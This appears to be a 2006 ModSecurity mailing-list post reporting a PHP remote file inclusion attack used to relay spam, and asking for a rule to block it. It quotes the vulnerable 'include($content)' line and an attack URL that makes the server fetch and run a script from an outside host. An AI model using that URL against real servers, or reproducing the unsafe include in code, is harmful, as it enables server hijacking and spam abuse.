[Modsecurity] Spam injection, very sneeky
MIKE YRABEDRA
lists at 323inc.com
Fri Oct 13 15:59:26 EDT 2006
Hey folks,
I have been using modsec to block all sorts of spam injection, but I have
found a new one.
I have a client that has a blanket style pages that includes anyhting sent
to it. Like so...
<? include($content); ?>
So if someone does this...
http://www.somesite.com/folder/index.php?content=http://home.arcor.de/dumpxp
l/mail.php?
..bad things happen. In my case over 100k of spam being relayed by my
server.
I caught this guy using modsec and searching ARGS with the same text as in
the spam. This is OK for now, until he uses a different spam.
The php script that did the damage can be seen here...
http://home.arcor.de/dumpxpl/mail.php
Is there a modsec rule that will prevent this sort of thing?
TIA
--
Mike Yrabedra B^)>
More information about the Modsecurity
mailing list